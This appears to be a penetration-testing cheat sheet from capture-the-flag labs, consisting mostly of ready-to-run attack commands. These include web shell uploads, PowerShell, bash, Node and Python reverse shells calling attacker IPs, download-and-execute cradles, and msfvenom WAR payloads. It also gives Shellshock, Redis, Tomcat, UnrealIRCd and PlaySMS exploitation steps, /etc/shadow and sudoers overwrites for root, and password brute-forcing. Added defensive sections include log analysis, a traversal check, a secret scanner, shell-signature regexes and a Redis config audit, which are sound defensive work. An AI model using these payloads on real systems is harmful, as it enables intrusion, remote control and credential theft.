Exploitation



Put a file using CURL

curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.10.10.10/test/shell.php

Brute Force SSH:

patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0

patator source: https://github.com/lanjelot/patator.git
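From the server side this kind of password guessing is loud in the auth log. The following is an added example (not from this page or from patator) that parses constructed OpenSSH-style auth.log lines, counts failed logins per source address and raises an alert for any source that crosses a threshold, listing the usernames tried and any account that then logged in successfully from the same source. The log lines, addresses and the default threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Constructed OpenSSH-style auth.log lines (sample data, not from a real host).
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 host sshd[1201]: Failed password for someone from 10.10.10.76 port 51000 ssh2
Mar  3 10:01:02 host sshd[1202]: Failed password for someone from 10.10.10.76 port 51001 ssh2
Mar  3 10:01:02 host sshd[1203]: Failed password for invalid user admin from 10.10.10.76 port 51002 ssh2
Mar  3 10:01:03 host sshd[1204]: Failed password for someone from 10.10.10.76 port 51003 ssh2
Mar  3 10:01:04 host sshd[1205]: Failed password for someone from 10.10.10.76 port 51004 ssh2
Mar  3 10:01:05 host sshd[1206]: Accepted password for someone from 10.10.10.76 port 51005 ssh2
Mar  3 10:05:00 host sshd[1300]: Failed password for bob from 192.168.1.20 port 40000 ssh2
Mar  3 10:06:00 host sshd[1301]: Accepted publickey for bob from 192.168.1.20 port 40001 ssh2
"""

# sshd writes "invalid user" for names that do not exist; both forms count as a failure.
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\d+\.\d+\.\d+\.\d+)")


def analyze_auth_log(log_text, threshold=5):
    """Return one alert per source IP that reached `threshold` failed logins.

    Each alert also lists accounts that logged in successfully from that source
    after at least one failure, which is the case worth escalating.
    """
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    succeeded_after_failures = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            users_tried[src].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(2)] > 0:
            succeeded_after_failures[m.group(2)].add(m.group(1))

    alerts = []
    for src, count in failures.items():
        if count >= threshold:
            alerts.append({
                "source": src,
                "failures": count,
                "users_tried": sorted(users_tried[src]),
                "compromised_candidates": sorted(succeeded_after_failures[src]),
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze_auth_log(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample data the 10.10.10.76 source is reported with five failures and "someone" as a compromised candidate, while the single failure from 192.168.1.20 stays below the threshold.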
Brute Forcing id_rsa using JohnTheRipper:

sshng2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod 600 id_rsa          //ssh refuses a private key that is readable by group or others

ssh -i id_rsa bhanu@10.10.10.10
Bruteforcing using Hashcat:

hashcat --example-hashes    //lists every supported hash type; pick the mode number and pass it with -m

cewl 10.10.10.46 > wordlist.txt    //create a wordlist from the files/words/links found on the web page
Windows Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Windows Payload: metasploit

msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX (New-Object Net.Webclient).DownloadString('http://SERVER/script.ps1')\"" -e x86/unicode_mixed lhost=10.10.10.74 lport=9001 -b '----------------------payload-------------' BufferRegister=EAX -f python
Upload a Shell to the Target:

powershell.exe -exec bypass -Command "& {Import-Module .\script.ps1; Invoke-CMDLET | Out-File -Encoding ascii file.txt}"

or

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://HOST/script.ps1'); Invoke-CMDLET | Out-File -Encoding ascii file.txt"

Example: Drupal Exploit
-> Exploit-DB; a modified copy is also kept in /root/Downloads/exploits/drupal. Affected versions: < 7.58, < 8.3.9, < 8.4.6, < 8.5.1

1) Run the exploit

2) Go to http://website.com/bhanu.php?cmd=whoami

3) http://website.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile -       //Get Reverse Shell
Brute Forcing ZIP Files:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt something.zip     //-u verifies each candidate with unzip so false positives are dropped
Working with Python Console

import os
os.popen("whoami").read()

os.popen("find /etc | grep iptables").read()     # locate the firewall rules to see which ports a reverse shell could use
os.popen("base64 -w 0 /etc/iptables/rules.v4").read()      # read a file as base64; check which ports are allowed

os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read()     # UDP reverse shell

nc -u -nvlp 1234   //listener for the UDP shell (run on the attacking machine, not inside the Python console)
Exploiting Apache Tomcat:

http://IP_ADDRESS:8080/manager/html/

login with default credentials --> tomcat/tomcat

upload a war file as a reverse shell

For Windows: msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tomcat.war

For Linux: msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tom.war

Extract the war file --> look for some_random_name.jsp

nc -nvlp 9001

http://IP_ADDRESS:8080/tom/some_random_name.jsp

Get your reverse shell on nc :)


Method-II

#Creating a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war > shell.war

#Uploading shell using curl
curl -u 'tomcat':'PASSWORD' -T shell.war 'http://10.10.10.10:8080/manager/text/deploy?path=/shells'

#List files
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/manager/text/list

#Running the Reverse Shell
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/shells/


Method-III

tomcatWarDeployer.py -U tomcat -P tomcat -H KALI_IP -p PORT 10.10.10.10:8080



Tomcat Exploit < 9.0.31
Path Traversal: https://10.10.10.10/manager/status/..;/html


Kibana Local File Inclusion < 6.4.3 & 5.6.13
Upload a Node JS reverse shell via Elasticsearch or any other method, then include it through the path below.

Node JS Reverse Shell:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Include it via the vulnerable endpoint:
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js
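The root cause is a user-controlled value being joined onto a directory path and loaded without confining it to that directory. An added example (my code, not Kibana's) of the check that closes this class of bug: the requested API name is first allowlisted, then the resolved path is required to stay under the base directory. The base directory, the `.js` suffix and the allowlist pattern are assumptions chosen to match the endpoint above.

```python
import os
import re

# Only plain identifiers such as "es_6_0" are legitimate API-definition names here
# (assumed allowlist; adjust to the names your application actually serves).
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")


def is_within(base_dir, relative_path):
    """True if base_dir/relative_path, after resolving '..' and symlinks, is still under base_dir.

    commonpath is used instead of startswith so that "/srv/api2/x" is not accepted
    for base "/srv/api".
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative_path))
    return os.path.commonpath([base, candidate]) == base


def resolve_api_path(base_dir, requested):
    """Map a user-supplied API name onto a file under base_dir, or raise ValueError.

    Two independent layers: the allowlist rejects anything that is not a bare
    identifier, and the containment check catches whatever the allowlist missed
    (for example a symlink created inside base_dir later).
    """
    if not SAFE_NAME.fullmatch(requested):
        raise ValueError(f"rejected API name: {requested!r}")
    relative = requested + ".js"
    if not is_within(base_dir, relative):
        raise ValueError(f"path escapes base directory: {requested!r}")
    return os.path.realpath(os.path.join(os.path.realpath(base_dir), relative))


def is_safe_api_name(base_dir, requested):
    """Boolean wrapper for callers that only need accept/deny."""
    try:
        resolve_api_path(base_dir, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("es_6_0", "../../../../../../path/to/shell", "/etc/passwd"):
        print(name, "->", is_safe_api_name("/srv/kibana/api", name))
```

The containment check is the one that matters for the traversal shown above: a value such as `../../../../../../path/to/shell.js` resolves to `/path/to/shell.js`, whose common prefix with the base directory is `/`, so it is refused before anything is read.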


https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
Exploiting Web.config: append the following code to the end of the web.config file, upload it to the server and request it to get a reverse shell. The reverse shell itself lives in winrevshell.ps1, so a file-sharing server hosting that file must be running as well.

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.6:8001/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Exploiting MongoDB - HTB Node

find creds in app.js
example: mongodb://username:password@localhost:port/.......=DEFAULT&authSource=databasename';

mongo -p -u username DBName

db.TableName.insert({"cmd" : "cp /bin/dash /tmp/file; chmod 6755 /bin/dash;chmod u+s /tmp/file"})           //Creating a SUID copy of dash
db.TableName.find()

/tmp/file -p                   //run with privs (-p keeps the elevated effective uid)
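The foothold here is a connection string with the password embedded in app.js. An added example (my code, not from this page or the HTB machine) of the secret scan that catches this before deployment: it finds `scheme://user:password@host` strings for common database URL schemes in a constructed source snippet, reports them with the password masked, and can rewrite the file with the password redacted. The source snippet, usernames and passwords are constructed placeholders.

```python
import re

# Constructed app.js-style source with embedded credentials (placeholder values).
SAMPLE_SOURCE = """\
const url = 'mongodb://appuser:Sup3rS3cret@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const safe = process.env.MONGO_URL;
const pg = "postgres://reporter:hunter2@db.internal:5432/reports";
"""

# scheme://user:password@host[:port] for the URL schemes most often hard-coded in app code.
CONN_RE = re.compile(
    r"\b(?P<scheme>mongodb(?:\+srv)?|postgres(?:ql)?|mysql|redis|amqp)://"
    r"(?P<user>[^:/@\s'\"]+):(?P<pw>[^@\s'\"]+)@(?P<host>[^/\s'\"?]+)"
)


def mask(secret):
    """Keep the first character so findings can be matched to a rotation ticket."""
    return secret[0] + "*" * (len(secret) - 1)


def find_embedded_credentials(text):
    """Return one finding per credential-bearing connection string, with the password masked."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        for m in CONN_RE.finditer(line):
            findings.append({
                "line": number,
                "scheme": m.group("scheme"),
                "user": m.group("user"),
                "host": m.group("host"),
                "password_masked": mask(m.group("pw")),
            })
    return findings


def redact(text):
    """Rewrite every matched connection string with the password removed."""
    return CONN_RE.sub(
        lambda m: f"{m.group('scheme')}://{m.group('user')}:<REDACTED>@{m.group('host')}", text
    )


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_SOURCE):
        print(f)
    print(redact(SAMPLE_SOURCE))
```

The line reading the URL from `process.env` is what the first line should look like; the scanner leaves it alone because no credential is present in the source text.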
Exploiting Haraka < 2.8.9

Exploit --> Available Here

Change the port number if required on line 123

 ./haraka.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross

Exploiting a CGI-bin Vulnerability : Shell Shock:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
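Every shell shown so far on this page leaves a recognisable string somewhere a defender can read it: the `() { :; };` header of Shellshock in the access log, `/dev/tcp/` and the mkfifo-to-nc pipe in process command lines, the `New-Object Net.WebClient).DownloadString` cradle in PowerShell logging, and the `os.dup2(s.fileno()` idiom of the Python shell. An added example (my code, not from this page): a small signature scan that runs those patterns over constructed log lines and reports which ones fire on which line. The log formats and lines are constructed; only the patterns come from the commands above.

```python
import re

# Signatures for the reverse-shell and download-cradle techniques shown on this page.
SIGNATURES = {
    "shellshock_header": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "mkfifo_nc_pipe": re.compile(r"mkfifo\s+\S+.*\|\s*nc\b"),
    "powershell_cradle": re.compile(r"(?i)new-object\s+net\.webclient\)\s*\.downloadstring"),
    "python_dup2_shell": re.compile(r"os\.dup2\(\s*s\.fileno\(\)"),
}

# Constructed log lines (sample data): an Apache access-log entry carrying the
# Shellshock User-Agent, three process command lines, and one benign request.
SAMPLE_LINES = [
    '10.10.14.5 - - [03/Mar/2024:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 12 "-" '
    '"() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1"',
    'proc: uid=33 cmd="sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f"',
    'proc: uid=1000 cmd="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.33:8001/rev.ps1\')"',
    'proc: uid=1000 cmd="python -c import socket,subprocess,os;s=socket.socket();s.connect((\'10.10.10.10\',9001));os.dup2(s.fileno(),0)"',
    '10.10.14.5 - - [03/Mar/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def scan_lines(lines):
    """Return (line_number, signature_name) for every signature that fires on each line."""
    hits = []
    for number, line in enumerate(lines, 1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits


def scan_file(path):
    """Convenience wrapper to run the same scan over a real log file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_lines(fh.read().splitlines())


if __name__ == "__main__":
    for number, name in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {name}")
```

The first sample line fires twice (the Shellshock header and the bash `/dev/tcp` redirection travel together in that request), which is a useful property: correlated hits on one line are far less likely to be noise than a single pattern match.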
  
Exploiting Redis server

ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h 10.10.10.10 -p 6379 flushall
cat foo.txt | redis-cli -h 10.10.10.10 -p 6379 -x set crackit
redis-cli -h 10.10.10.10 -p 6379

config get dir
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save
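The key-file write above needs four things to be true at once: the instance listens on a reachable interface, protected mode is off, no password is required, and CONFIG has not been renamed away. An added example (my code, not from this page or the Redis project) that audits a redis.conf for exactly those four conditions, parsing the file the way Redis does (whole-line `#` comments only, directives may repeat, last value wins for single-valued ones). The two configuration excerpts are constructed; the `requirepass` value is a placeholder.

```python
# Constructed redis.conf excerpts (sample data, not from a real host).
EXPOSED_CONF = """\
# listens everywhere, no password, CONFIG still reachable
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass a-long-random-secret-placeholder
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::"}


def parse_redis_conf(text):
    """Return {directive: [value, ...]}; Redis only treats lines starting with '#' as comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return the set of weaknesses that together make the authorized_keys write possible."""
    conf = parse_redis_conf(text)
    findings = set()

    # No bind line at all means every interface.
    binds = conf.get("bind", [])
    if not binds or any(addr in WILDCARD_BINDS for b in binds for addr in b.split()):
        findings.add("listens-on-all-interfaces")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.add("protected-mode-disabled")

    passwords = [p for p in conf.get("requirepass", []) if p.strip("\"'")]
    if not passwords:
        findings.add("no-auth")

    # rename-command CONFIG "" removes the command; any other rename at least hides it.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.add("config-command-exposed")

    return findings


if __name__ == "__main__":
    print("exposed :", sorted(audit_redis_conf(EXPOSED_CONF)))
    print("hardened:", sorted(audit_redis_conf(HARDENED_CONF)))
```

Renaming CONFIG (or restricting it with ACLs on Redis 6 and later) is the single change that breaks the `config set dir` / `config set dbfilename` sequence shown above even if the other three conditions are later regressed.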
Exploiting UnRealIRCd

ncat 10.10.10.117 8067         //IRC channel opens
PASS somepass
NICK somenickname
USER username hostname servername :realname    //we can see the IRC server talking to us

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'" | nc 10.10.10.117 8067            //in a new terminal

ncat -lvnp 9001             //shell opens
pspy for Solaris
#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo args -o pid)

while true; do
        new_process=$(ps -eo args -o pid)
        diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]' | grep -v "ps -eo args"
        sleep .1
        old_process=$new_process
done
Exploiting PlaySMS 1.4 - Exploit

Get login creds and login

go to http://192.168.227.140/SecreTSMSgatwayLogin/index.php?app=main&inc=feature_sendfromfile&op=list

Create the payload: save the payload as exploit & upload it
<?php system('echo "bash -i >& /dev/tcp/192.168.227.135/443 0>&1"> /tmp/shell'); ?>,2,3

Edit the exploit & upload it again
<?php system('chmod +x /tmp/shell'); ?>,2,3

Edit the exploit & upload it again
<?php system('bash -c /tmp/shell'); ?>,2,3

Get the shell on nc -nvlp 443
PHP Functions for Pentest:

scandir("/home")

file_get_contents("/root/root.txt")

file_put_contents("/root/root.txt","Enter whatever you want to write into root.txt - you can even append data to it by adding FILE_APPEND",FILE_APPEND)
 
wpscan -u http://website.com --enumerate t --enumerate p

     --> enumerate themes (t) and plugins (p) on a WordPress site; use --enumerate u to list usernames
wpscan -u http://10.10.10.46 --username UserName --wordlist /root/Desktop/list.txt

                    --> bruteforce a WordPress username with a password list
use exploit/unix/webapp/wp_admin_shell_upload

-->this can be used to upload a shell when you know username and password
If find has the SUID bit set, this command replaces the root hash in /etc/shadow so that the root password becomes 1234:
find . -exec sed -Ei 's/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/' /etc/shadow \;
su root                 //enter 1234 at the password prompt
 
SeImpersonatePrivilege or SeCreateGlobalPrivilege Enabled Exploit

JUICY Potato Exploit

Binaries: 64-bit / x86 Version; CLSID list: Get CLSID

jp86.exe -l 1336 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}

Worked for Windows 7 Professional --> {6d18ad12-bde3-4393-b311-099c346e6df9}
SeLoadDriverPrivilege Enabled

Needs a vulnerable driver: download Capcom.sys onto the target machine

Download the exploit https://github.com/TarlogicSecurity/EoPLoadDriver/ & execute it

https://github.com/tandasat/ExploitCapcom --> download the exploit

create a batch file containing a reverse shell
echo nc.exe 10.10.10.10 9001 -e cmd.exe > shell.bat

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService Capcom.sys

.\ExploitCapcom

If Perl got Root Permissions:

sudo /usr/bin/perl -e 'exec "/bin/sh"'
Get Root Using Openssl which got capabilities: Read root files

getcap openssl     //the capability set should end in "ep" (effective + permitted)

openssl enc -in "/etc/passwd"

openssl enc -in "/root/root.txt"


Getting a shell using Openssl

./openssl enc -in /etc/sudoers > sudoers

vi sudoers                      //add the line below to the sudoers file, after the "root ALL=(ALL) ALL" line
Username  ALL=(ALL)  ALL

cat ./sudoers | ./openssl enc -out /etc/sudoers
SSH: no matching key exchange method found:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
